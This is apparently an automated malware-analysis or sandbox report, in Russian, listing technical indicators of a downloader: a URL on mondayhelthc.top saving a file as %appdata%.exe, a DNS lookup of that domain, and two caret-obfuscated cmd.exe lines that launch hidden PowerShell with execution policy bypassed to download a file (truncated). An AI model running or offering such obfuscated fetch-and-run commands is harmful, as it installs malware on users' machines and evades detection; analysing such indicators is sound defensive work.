Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^w^E^rs^H^e^Ll.E^XE^ ^-EXEC^U^TION^P^OlicY^ ^B^YPass ^-^NOp^R^OfIl^e^ -W^iNDoWS^Ty^L^e^ H^Idd^E^n ^(^n^ew-^oB^j^e^C^T^ syS^te^m.n^eT.^wEBC^LiEn^t^).DO^WnloA^DfIL^E('http...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "pO^w^E^rs^H^e^Ll.E^XE^ ^-EXEC^U^TION^P^OlicY^ ^B^YPass ^-^NOp^R^OfIl^e^ -W^iNDoWS^Ty^L^e^ H^Idd^E^n ^(^n^ew-^oB^j^e^C^T^ syS^te^m.n^eT.^wEBC^LiEn^t^).DO^WnloA^DfIL^E('http... (со скрытым окном)